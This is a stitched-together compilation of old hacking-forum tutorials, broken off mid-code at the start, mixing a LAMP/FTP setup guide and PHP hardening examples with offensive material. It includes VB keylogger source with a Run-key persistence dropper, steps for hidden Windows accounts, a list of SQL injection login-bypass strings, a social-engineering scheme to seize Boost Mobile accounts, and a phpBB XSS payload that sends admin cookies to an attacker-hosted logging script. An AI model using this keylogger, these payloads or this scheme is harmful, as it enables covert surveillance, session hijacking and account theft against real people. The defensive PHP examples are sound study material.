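foreach (stackReport('/home/[username here]/www', 8000) as $name => $state) {
    printf("%-26s %s\n", $name, $state);
}
```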
To make this a little more complete I am going to go one step further and show you how to gain FTP access to your new LAMP stack!
We will now download a service called proftpd. Do this by typing:
sudo apt-get install proftpd
Simple enough. Just as a side note, I recommend installing it as standalone when the installer asks. Now back to our lovely friend nano to do some configuring!
Find the line that defines the following:
# Use this to jail all users in their homes
#DefaultRoot ~
and change it to:
# Use this to jail all users in their homes
DefaultRoot /home/[username here]/www
Just note exactly what we did. We changed it so that anyone who logs in to the FTP server will only have access to the web server files, AND we had to uncomment the line (remove the '#').
Before I forget I want to say we edit the FTP config with the following:
sudo nano /etc/proftpd/proftpd.conf
Also note that most ISPs block port 21 (the FTP port), so we will change that as well.
So find the line:
# Port 21 is the standard FTP port.
Port 21
And change it to:
# Port 21 is the standard FTP port.
Port 2121
Now forward the port 2121 to your LAMP stack as well. Following that we will restart the FTP service by typing:
sudo /etc/init.d/proftpd restart
LETS TRY CONNECTING!
Open an FTP client and connect to the address of your LAMP stack on port 2121.
So, for example, on the MS command-line FTP client it would be:
open 192.168.1.68 2121
and log in using the credentials of your Linux box. (Keep in mind that plain FTP sends that login in clear text, so once port 2121 is forwarded to the Internet your Linux username and password cross the wire unencrypted; SSH's sftp subsystem gives the same file access without that.)
TA DA! Now you have a working web host with full FTP access!
Creating a simple key logger
By Dat Hacker
VB Required
First of all you need to make an extractor for your virus; name it "simple keylogger extractor":
Now create a keylogger, make it have 0% opacity and create a textbox named textbox1 and a timer named timer1, set the timer to an interval of 1 and enable it, then add this code:
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = Chr(i)
End If
Next i
Dim filetxt, getname, path, filesys
path = filesys.GetPathName("C:\windows\system32\log.log")
getname = filesys.GetFileName(path)
filetxt.WriteLine(TextBox1.Text)
filetxt.Close()
TextBox1.Text = ""
End Sub
End Class
There will be "Warnings"; ignore them, as they will not interfere. Now save this, compile it and go to the debug area (c:\users (or documents and settings)\username\documents\Visual Studio 2008\Projects\simple keylogger\simple keylogger\bin\Debug).
Here you will find an exe that will be the program. Rename it sys.txt and copy it to your desktop. Now open simple keylogger extractor, create 2 textboxes, leave the names as textbox1 and textbox2, and make them multiline. Make the opacity 0% and copy this text to the file:
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Shell = CreateObject("wscript.shell")
shell.run("c:\windows\system32\reg.reg")
shell = Nothing
shell = CreateObject("wscript.shell")
shell.run("c:\windows\system32\sys.exe")
shell = Nothing
Dim filetxt, getname, path, filesys
path = filesys.GetPathName("C:\windows\system32\reg.reg")
getname = filesys.GetFileName(path)
filetxt.WriteLine(TextBox1.Text)
filetxt.Close()
path = filesys.GetPathName("C:\windows\system32\sys.exe")
getname = filesys.GetFileName(path)
filetxt.WriteLine(TextBox2.Text)
filetxt.Close()
Dim shell
Me.Close()
My.Computer.FileSystem.DeleteFile("passwordcracker.exe")
My.Computer.FileSystem.DeleteFile("c:\windows\system32\reg.reg")
End Sub
End Class
Now set the textboxes, textbox1 should have the text:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"sys"="c:\\windows\\system32\\sys.exe"
And textbox2 should have the text you generated from your keylogger (just copy the text).
The program should run successfully; feel free to change the scripting around.
How to make a hidden user account
go to start > run > type regedit
in the menu go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
right click and select new string value
right click on the new string value and click rename
type the name of the account you want to hide (exactly the way it is spelled)
hit enter, then right click on the string value again and click modify; change the value to 0, which hides it (1 shows it)
now exit the registry and log off
go to the welcome screen and hit ctrl+alt+del twice to bring up the old logon prompt
type the hidden account's name and password.
also hide all of the hidden account's files.
Locking and Hiding Hard-Drives
Follow these steps below:
1. Open the Registry Editor (go to the run command, type "regedit" and press enter)
2. Then go to this key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Now right-click and create a DWORD Value (blue icon)
4. Rename it "NoViewOnDrive" (for locking a drive)
or
Rename it "NoDrives" (for hiding a drive)
5. Double-click it, enter the number for your desired drive and click OK. (To cover more than one drive, add their numbers together.)
6. Here are the drive numbers:
A: 1
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
7. Finally restart or log off the computer for it to take effect.
Keep in mind that "0" is the default value and disables or removes this setting.
Batch Files
....Technically, DOS provides just eight basic batch file commands -- CALL, ECHO, FOR, GOTO, IF, PAUSE, REM, and SHIFT -- plus a tiny assortment of miscellaneous doodads: replaceable parameters, environment variables, labels, double == signs, and @ signs. That's it! Not too much to learn, even for the most fervent DOS-hater. But the tools these few commands can create will astonish you.....
PC Computing - DOS Power Tools by Paul Somerson
Batch files can be used for a large number of different things, anything from getting specific commands to start at specific times, to opening cmd in a limited account, to getting a first easy taste of the magic of programming, to just having the thrill of being able to write in it!
Batch files are made from the basic notepad (WIN + R, then type in notepad).
Inside notepad the fun can begin.
BASIC BATCH FILES
To start with, we'll make a simple .bat file to say "Hello World" and then pause.
@echo off
echo Hello World!
echo.
pause ::
exit
rem I love undergroundsystems.org!
Ok, now to have fun and dissect it :P
To start with there's the @echo off. The @ means that the "echo off" part of the code isn't shown to the user when it runs. The "echo off" is also a secret spy tool! When this is put in, the user can still run the program, but without the flipping
"C:\documents and settings\my documents\" prompt, or wherever you're logged on, being printed before every line.
The echo is like the "COUT" command in C. It sends whatever you write after it to the screen of your bat file. When you wrote "echo Hello World!", it sends "Hello World!" to the screen, omitting the echo. The "echo." is a nifty command to make writing in a batch file a lot easier. It basically just leaves a blank line, which I can tell you is a hell of a lot easier to see than, say:
Hello World
Press any key to continue...
:eek: :eek: :eek:
Next there is the "pause ::". Now I don't think there is any difference if you write "pause" or "pause ::". In any case, they both do the same visible thing. :rolleyes: When you type this into your batch file, it will say when you run the program:
"Press any key to continue" Gosh, not a please! :mad:
As soon as you press any key, the program will continue to the next line of the code, which in our case is the "exit" command. This does what any jack-a$$ might think it does....exits or shuts down the program. Nothing spectacular lol.
Finally in our little program, there is the "rem I love US.org!". Now if you added this into your program, when you ran it you might or might not have been a bit puzzled to see that it didn't pop up. WTF? This is because rem is just for you to write your notes after it...maybe not for a program like "Hello World", but for something much longer and harder to script.
Phew, that was a hell of a lot for 5 lines of programming! (goes off to get a cup'a'tea.)
GETTING CMD WITH BATCH FILES
Many people use batch files to get good old cmd in, say, a limited user account. First can I say that I'm not encouraging anyone to try and do this, errr, it's for administrators to test their security?....what is it :rolleyes: ....erm, for security testing purposes only?....oh well, this isn't top secret super hacker stuff...
Most cmd commands can be run from a batch file, and cmd can also be run from a batch file. Here is a little script I just made (sorry for any mistakes), which will try and open cmd with a variety of methods:
@echo off
pause
cmd.exe
pause
command.com
pause
cmd
pause
c:\WINDOWS\system32\cmd.exe
pause
rem ############echo please modify this accordingly############
COPY "c:\WINDOWS\system32\cmd.exe" "c:\documents and settings\##please enter your username here##\my documents"
pause
exit
Now, this code simply goes through different ways to open up cmd. The first 5 ways will always work..unless your admin :P (yer, I know you'll try this in schools) blocks them. If your admin is like the BOFH (http://www.google.co.uk/search?hl=en&q=bofh&meta=) he might even have banned batch files, but oh well.... they did for me.. :madman:
Final section now..
RUNNING EASIER SCRIPTS!
Now batch files can also be used to make nice simple scripts that help the tards out there. :tard:
Here is one which basically helps you make a new user on your non-networked computer.
@echo off
:A
cls
echo Poetic-Justics's user creation program.
echo.
set /p n="Old User-name: "
echo.
set /p m="New user-name: "
echo.
set /p p="New user-name password: "
echo.
set /p g="new user-group: "
echo.
set /p s="Are you sure you want to do this? "
if /i "%s%"=="yes" goto B
if /i "%s%"=="no" goto C
goto C
:B
cls
net user %m% %p% /ADD
net user %n% /DELETE
rem non-networked machine: use localgroup, since "net group" only works against a domain
net localgroup %g% %m% /ADD
:C
cls
echo Thanks for using this easy user creation....blah, blah, blah..
echo.
pause ::
exit
Now you could also add in things such as "please confirm the password" or whatever, but I'm too tired :P In case anyone did want to try and do that though, it's:
set /p h="please confirm password: "
if "%h%"=="%p%" goto "wherever you want it to go to"
FINAL WORDS!
Anyway, here are my final words on cmd. Batch files are a great way to start programming in my view; it's a lot easier than most other proper things like C, Delphi etc., but it's a lot more limited. It's really easy to learn actually, and when you can, you get the great feeling that you can do most things with them.
Some links that might help you (they did help me) are:
*http://www.robvanderwoude.com/batchfiles.html
*http://www.ericphelps.com/batch/tricks/index.htm
*http://www.ericphelps.com/batch/
Securing your PHP code
Some of the most basic and overlooked things are cleaning your variables and all user input. Many variables can be overwritten with data supplied by a malicious user. Let's say you have an admin panel on your website that's not the most secure thing, y'know, but it works well. Someone finds a hole or bruteforces their way in without any visible sign. That admin panel may be able to delete files. What's to say the attacker doesn't just delete files but goes ahead and deletes passwd entries or other sensitive server files that would stop them from advancing?
All inputs coming in from the "outside" should be checked for malicious content!!! I will not cover security with your database. I have written many articles on SQL injection; if you don't know what it is, please research it. Database security is very important, but I will not cover it here.
Magic Quotes
Magic quotes are a "godsend" when it comes to dealing with user input. When this option is turned on (located in your php.ini) it escapes all single and double quotes, backslashes, and NULL bytes in a user's input with a backslash. The problem with turning magic quotes on is that maybe you want your users to use single or double quotes, or to upload files. If you turn this off you can parse the strings from the user-entered data at "runtime".
If you're new to PHP I would suggest turning this on until you learn how to properly parse and display data that users enter. I personally use a "clean" function that I've written. I will give you a basic "on-the-fly" one just for this tutorial so you can start building your own cleaning function.
<?php
function clean($string) {
    $string = stripslashes($string);   // undo the backslashes magic quotes added
    $string = strip_tags($string);     // remove HTML tags first; after entity encoding there would be no tags left to strip
    $string = htmlentities($string);   // encode what remains so it displays as text, not markup
    return $string;
}
?>
You would use this function like below, if your user was submitting a form that required a username.
<?php
$username = $_POST['username'];
echo clean($username);
?>
There are 3 directives for the magic quotes; refer to the php.net website or the PHP manual. Basically the 3 directives are: magic_quotes_gpc, which deals with the request data (GET, POST, cookies); magic_quotes_runtime, which deals with flat files, databases and other external data; and the third is magic_quotes_sybase, which overrides magic_quotes_gpc if it's enabled. This one escapes single quotes with another single quote.
---------------
Security Through Obscurity
Recently, as you may not have noticed but I sure have, on some websites an ASP or Perl extension can be found in place of the normal PHP one when you know for a true, 100% fact that the website is running a PHP/SQL based front and back end. This is "security through obscurity": instead of telling the attackers you're using PHP scripts you mislead them into thinking you're running Perl or Python or whatever type of script you want.
For example, you run a PHP script with the .php extension, like normal. Rather than showing the world your "hello.php" script you can actually use Apache to "hide" or "obscure" the real file's extension. So instead of normally using "hello.php" you could disguise the file to viewers as Perl, "hello.pl", even though it's a PHP script, like so...
AddType application/x-httpd-php .asp .py .pl
my favorite is making up my own file extensions, like .sun or .fuck
AddType application/x-httpd-php .sun .fuck .1e3t
I'm sure if an attacker is just looking for something to fuck with and comes across a .sun file that runs like a PHP file, they'll be heartbroken and confused. Give it a try. The above lines go in the Apache configuration file. If you're on shared hosting you may not have access to the Apache configuration files; maybe you could make some suggestions to your host.
---------------
Register Globals
This was a big change in PHP when 4.2 came out. This is an on/off option in the INI file for PHP (php.ini). PHP doesn't force you to initialize variables like other languages do, and for this people think it's a very insecure language. When register_globals is on it will allow a request to set a variable. The best kind of example is a member login form. Let's say register_globals is on..
<?php
if($authed == true) {
    echo "my sensitive information";
}
?>
Any user can get to the "sensitive information" by sending a GET request. You could do this via telnet or by browser, like so: sin.php?authed=true, which reveals the sensitive information. Turning register_globals off will defeat this problem. Now when we try to visit sin.php?authed=true, it will be blank. Users cannot initialize variables from an external source. Another way to protect your variables from external sources would be to check if they are submitted via a GET or POST request.
<?php
$authed = true;
if(isset($_POST['authed']) || isset($_GET['authed'])) {
    echo "variable violation";
} else {
    if($authed == true) {
        echo "my sensitive information";
    }
}
?>
By monitoring the GET and POST requests we can check to see if someone is trying to inject something into our variables without the script doing it. This is usually followed by not only a message telling them they have tampered with the variable, but usually a mail() call to notify the admins of the website. I love this one.
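Pulling the section's points together, here is an added example of my own (not the tutorial author's code): a login gate that initialises its own variables, validates on the way in and escapes on the way out, and logs requests that try to set a protected variable name. It assumes a form field named username and a session key user_id.

```php
<?php
// Added example, not code from the original tutorial. Assumes a POST form field
// "username" and a session that stores an integer "user_id" once logged in.

// Names the application sets itself and that a request must never supply.
// Generalises the tutorial's isset($_POST['authed']) || isset($_GET['authed']) check.
const PROTECTED_NAMES = ['authed', 'user_id', 'is_admin'];

// Returns the first protected name found in the request, or null if none.
function requestTampersWith(array $get, array $post, array $protected = PROTECTED_NAMES): ?string
{
    foreach ($protected as $name) {
        if (array_key_exists($name, $get) || array_key_exists($name, $post)) {
            return $name;
        }
    }
    return null;
}

// Undo magic quotes only when PHP actually added them (the feature was removed
// in PHP 5.4); otherwise stripslashes() eats backslashes the user typed on purpose.
function undoMagicQuotes(string $s): string
{
    if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
        return stripslashes($s);
    }
    return $s;
}

// Validate on the way in: accept only what a username is allowed to look like.
function isValidUsername(string $s): bool
{
    return preg_match('/^[A-Za-z0-9_]{3,32}$/', $s) === 1;
}

// Escape on the way out, for an HTML body context. strip_tags() has to run before
// the entity encoding: once < and > have become &lt; and &gt; there are no tags
// left for it to remove.
function cleanForHtml(string $s): string
{
    $s = strip_tags($s);
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Register-globals-proof gate: $authed is initialised here and derived from the
// session only, so sin.php?authed=true cannot set it whatever php.ini says.
function isAuthed(array $session): bool
{
    $authed = false;
    if (isset($session['user_id']) && is_int($session['user_id'])) {
        $authed = true;
    }
    return $authed;
}

// --- request handling ---
session_start();

if (($name = requestTampersWith($_GET, $_POST)) !== null) {
    // The tutorial mails the admins at this point; error_log() keeps the example offline.
    error_log(sprintf('variable violation: %s tried to set "%s"',
        $_SERVER['REMOTE_ADDR'] ?? 'unknown', $name));
    http_response_code(400);
    exit('variable violation');
}

$username = undoMagicQuotes($_POST['username'] ?? '');
if ($username !== '' && !isValidUsername($username)) {
    http_response_code(400);
    exit('invalid username');
}

if (isAuthed($_SESSION)) {
    echo 'my sensitive information';
} else {
    echo 'Hello, ', cleanForHtml($username === '' ? 'guest' : $username);
}
```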
Bypassing login scripts with SQL Injection
A database is a set of tables full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL, web applications interact with databases to dynamically build customized data views for each user.
Data types:
mysql.user
mysql.host
mysql.db
SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
Bypassing login scripts:
SQL injection strings; the DB doesn't matter.
') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1
Note: having 1=1--
Example:
Login: hi'or 1=1--
Password: hi'or 1=1--
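To see what the strings above do to a login query, and what stops them, here is an added example of my own (not code from the original tutorial): the same login check written the vulnerable way and the fixed way against an in-memory SQLite table constructed in the script. It assumes the pdo_sqlite extension is available.

```php
<?php
// Added example, not code from the original tutorial. Two versions of a login
// check against an in-memory SQLite table (constructed below), so the strings
// listed above can be tried without a real site. Requires pdo_sqlite.

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // "password" is the plaintext column a legacy login script compares inside
    // SQL; "pw_hash" is what the fixed version uses. One constructed sample user.
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,
                                   password TEXT, pw_hash TEXT)');
    $st = $db->prepare('INSERT INTO users (username, password, pw_hash) VALUES (?, ?, ?)');
    $st->execute(['admin', 's3cret', password_hash('s3cret', PASSWORD_DEFAULT)]);
    return $db;
}

// The pattern the strings above are aimed at: input spliced into the query text.
// With "hi'or 1=1--" in both fields the WHERE clause becomes
//   username = 'hi'or 1=1--' AND password = 'hi'or 1=1--'
// and everything after -- is a comment, so a row always comes back.
function vulnerableLogin(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT id FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row !== false;
}

// Fixed version: the username travels as a bound parameter, so quotes and comment
// markers are data, never SQL; the password is verified against a hash in PHP
// instead of being compared inside the query.
function safeLogin(PDO $db, string $user, string $pass): bool
{
    $st = $db->prepare('SELECT pw_hash FROM users WHERE username = ?');
    $st->execute([$user]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['pw_hash']);
}

// Logging-only detector for the shapes in the list above (a quote followed by
// OR, a comment marker, or an "or x=x" tautology). Useful for alerting on login
// forms; it is not a substitute for the prepared statement, because the list is
// open-ended and encodings vary.
function looksLikeInjection(string $s): bool
{
    return preg_match('/(\'|")\s*or\s+|--|\bor\s+\S+\s*=\s*\S+/i', $s) === 1;
}

$db = makeDb();
foreach (["hi'or 1=1--", "admin'--", "' or 'x'='x"] as $payload) {
    printf("%-14s vulnerable=%-9s safe=%-7s flagged=%s\n", $payload,
        vulnerableLogin($db, $payload, $payload) ? 'LOGGED IN' : 'denied',
        safeLogin($db, $payload, $payload) ? 'LOGGED IN' : 'denied',
        looksLikeInjection($payload) ? 'yes' : 'no');
}
// The legitimate credentials still work in both versions.
printf("%-14s vulnerable=%-9s safe=%s\n", 'admin/s3cret',
    vulnerableLogin($db, 'admin', 's3cret') ? 'LOGGED IN' : 'denied',
    safeLogin($db, 'admin', 's3cret') ? 'LOGGED IN' : 'denied');
```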
How to hack boost mobile
First of all call 611 and press 3 then wait till it says enter your phone number, enter the person's number you're trying to get, it will say you have xx days remaining on your account, Boost mobile gives you 90 days so take 90 from whatever they have (example 90-80 days left, so they bought a card 10 days ago). So you take the days and look on a calendar, say it's 10 days ago and today is Dec 11th, so they bought a boost card on Dec 1st, and it's most likely a $20 card so you can guess it, there's only $20, $30, $50 cards. Ok, keep this information written down.
Ok next you need 3 phones by you and you must know all the numbers including area codes, they don't need to be cell phones, using all the phones call the person you're trying to get the access code for, via *67 (private); don't worry, it won't show up private to boost, but it will to the person you're trying to do it to. Next after you call them with those numbers, have those numbers written down and ready, call 611 again and hit 4, then 6, when you call say you forgot your boost passcode, they will ask you when you last rebooted and how much (the $ is a guess but you can usually guess from how much their balance was and how many days they rebooted but it's mostly $20), then they will ask you to tell them the last 3 numbers they have called or received, that's where the 3 numbers you just called in work, after you tell them that they will give you the access code, and BOOM you have total control! enjoy!
REMEMBER WHEN YOU DO THE 3 CALLS YOU MUST BE CALLING BOOST ASAP BECAUSE IF SOMEONE ELSE CALLS IN YOU HAVE TO DO IT ALL OVER AGAIN.
Hacking phpBB 2.0.19 or lower by stealing cookies
Firefox (http://www.getfirefox.com)
Live HTTP Headers (http://livehttpheaders.mozdev.org/)
A Free Server with PHP (http://www.t35.com)
1 - Make a file with notepad
Insert this code into it:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('pwnt.txt', 'a'); //chmod 777 lol.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>
Save it as lol.php and upload it to your free server at t35.com.
2 - Now find a forum that you want to hack (if you see that HTML is off by default, like in this picture, forget it)
http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)
3 - This is the code you have to pm the admin
' onmouseover='document.location="http://yourdomain.t35.com/lol.php?c="+document.cookie' b='
http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg
Change yourdomain to your t35.com site. Change the picture to whatever you want or just leave it. Change lol.php to whatever you named the file you made in step 1.
When the admin puts his mouse over this code it will redirect him to your PHP file and show him a blank screen; you can modify that so it doesn't look so suspicious.
4 - Now find the admin or whoever you want to hack and PM him the code from step 3. Now you will have to wait about a day for him to realize he has a PM.
5 - Once he opens the message it will create a file on your server called ****.txt; open it.
You will see some code that looks like this:
Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991
A - The easiest way is to copy the password hash which in this case is
3921c75b299268bd87f48ec8c289c3f0
Copy that hash
go to md5.rednoize.com or any other cracker and paste it there, if nothing shows up, you will have to use http headers (in example B) to login as the admin.
B - Go to the forum you hacked, click on tools -> live http headers (assuming you have firefox and http headers installed)
Now refresh the page, at the top of the http headers screen you will see something like this:
http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)
Click on Replay
Delete all the code that comes after
cookie:
Replace it with the cookie string from step 5 that you received from your server's log.
JavaScript Injection
javascript:alert('Hello World');
This uses the function alert which, as you should now know, brings up an alert box.
Now onto something a bit more useful. Most websites you visit now will save a cookie on your computer, to see this you can use the following js:
javascript:alert(document.cookie);
You can also use the void function to add or change a variable. For my example I'm going to add a field called 'admin' and have its value set to 'true'. Here's how to do it:
javascript:void(document.cookie="Admin=True");
To see what effect this had use the following js again:
javascript:alert(document.cookie);
Alternatively you can concatenate the two commands (or for that matter any number of commands), in the following way:
javascript:void(document.cookie="Admin=True");javascript:alert(document.cookie);
Don't forget the ';' at the end of each command!
Now to fiddle with the http://elitehackers.info/forums forms/ >:) . If you right click and look at the source code for the page, the first form you will see should be this:
All the forms are stored in an array called 'forms', so the first form will be 'forms[0]' and the second 'forms[1]', etc. We are going to be changing the value of the 'showposts' field.
First lets bring it up in an alert box so we can see what it's currently set as:
javascript:alert(document.forms[0].showposts.value);
This should pop up an alert box showing the current value of 'showposts', which is '0'. To change this to '1' we will use the void function again:
javascript:void(document.forms[0].showposts.value="1");javascript:alert(document.forms[0].showposts.value);
Obviously this isn't very useful but used in other situations can come in handy. That's all folks!
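The cookie-stealing section and the JavaScript injection section above both rest on three server-side gaps: a cookie that page script can read, a user-supplied attribute value echoed into HTML unescaped, and a form field taken at face value. This added example of my own (not phpBB's code or either author's) closes them in PHP 7.3+; the cookie, field and session names are assumptions.

```php
<?php
// Added example, not phpBB's code or the original tutorials'. Closes the three
// gaps the sections above rely on. Cookie, field and session names are assumptions.

// 1. A session cookie that document.cookie cannot read (HttpOnly), that is only
//    sent over HTTPS (Secure) and not on cross-site navigations (SameSite=Lax).
//    Array form of session_set_cookie_params(), PHP 7.3+.
function startHardenedSession(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// 2. Build an <img> tag from a user-supplied URL (the [img] case in the PM).
//    Returns null unless the value is an absolute http(s) URL. The accepted value
//    is escaped with ENT_QUOTES, so a payload such as  ' onmouseover='...' b='
//    stays text inside the src attribute instead of becoming new attributes.
function safeImgTag(string $url): ?string
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;          // rejects javascript:, data: and friends
    }
    $esc = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<img src="' . $esc . '" alt="">';
}

// 3. Never let a form field or a cookie decide authorisation. showposts comes
//    from the request but is clamped to the values the page actually offers;
//    "admin" is read from the server-side session, never from a cookie the
//    client can set itself with void(document.cookie="Admin=True").
function normaliseShowPosts($raw): int
{
    $allowed = [0, 1];
    $v = filter_var($raw, FILTER_VALIDATE_INT);
    return ($v !== false && in_array($v, $allowed, true)) ? $v : 0;
}

function isAdmin(array $session): bool
{
    return isset($session['role']) && $session['role'] === 'admin';
}

// Demonstration with constructed inputs.
$pmPayload = "' onmouseover='document.location=\"http://example.invalid/lol.php?c=\"+document.cookie' b='";
var_dump(safeImgTag($pmPayload));                          // NULL: not a URL at all
var_dump(safeImgTag('javascript:alert(document.cookie)')); // NULL: scheme not allowed
echo safeImgTag('http://example.invalid/pic.png'), "\n";   // a plain <img> tag
var_dump(normaliseShowPosts('1'));                         // int(1)
var_dump(normaliseShowPosts('99'));                        // int(0): not an offered value
var_dump(isAdmin(['role' => 'member']));                   // bool(false), whatever the cookies say
```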
Bypassing Web Filtering Systems
on bypassing most filtering systems. This tutorial will show you where to obtain public proxies, private proxies, where/what programs to download, and how to use those programs. Also a couple of ways that do not require using a proxy server or a program.
Proxy Servers:
A proxy server is a server that will accept traffic in, route it to your destination, and then route it back to you. A couple of places you can find public proxy servers are:
http://www.publicproxyservers.com/
http://www.samair.ru/proxy/
http://www.multiproxy.org/
These are just a couple of examples I grabbed searching Google. I've used samair.ru and multiproxy.org before and both are fairly decent; there are a couple of times that proxies from these sites do not work, but most of them do, so no worries.
Applying a proxy is very easy, I'll show you how to do it using Internet Explorer and Firefox:
Internet Explorer:
1)Click Tools
2)Click Internet Options
3)Click Connections tab
4)Click LAN Settings
5)Check the use a proxy server box
6)Put in the IP address of the proxy in the address box
7)Put the port number the proxy is using in the port box
Firefox:
1)Click Tools
2)Click Options
3)Click General tab
4)Click Connection Settings
5)Select Manual Proxy Configuration
6)Put the IP address of the proxy in the HTTP Proxy box
7)Put the port number of the proxy in the port box
Now then, that wasn't too hard. This is how you can find and use a public proxy.
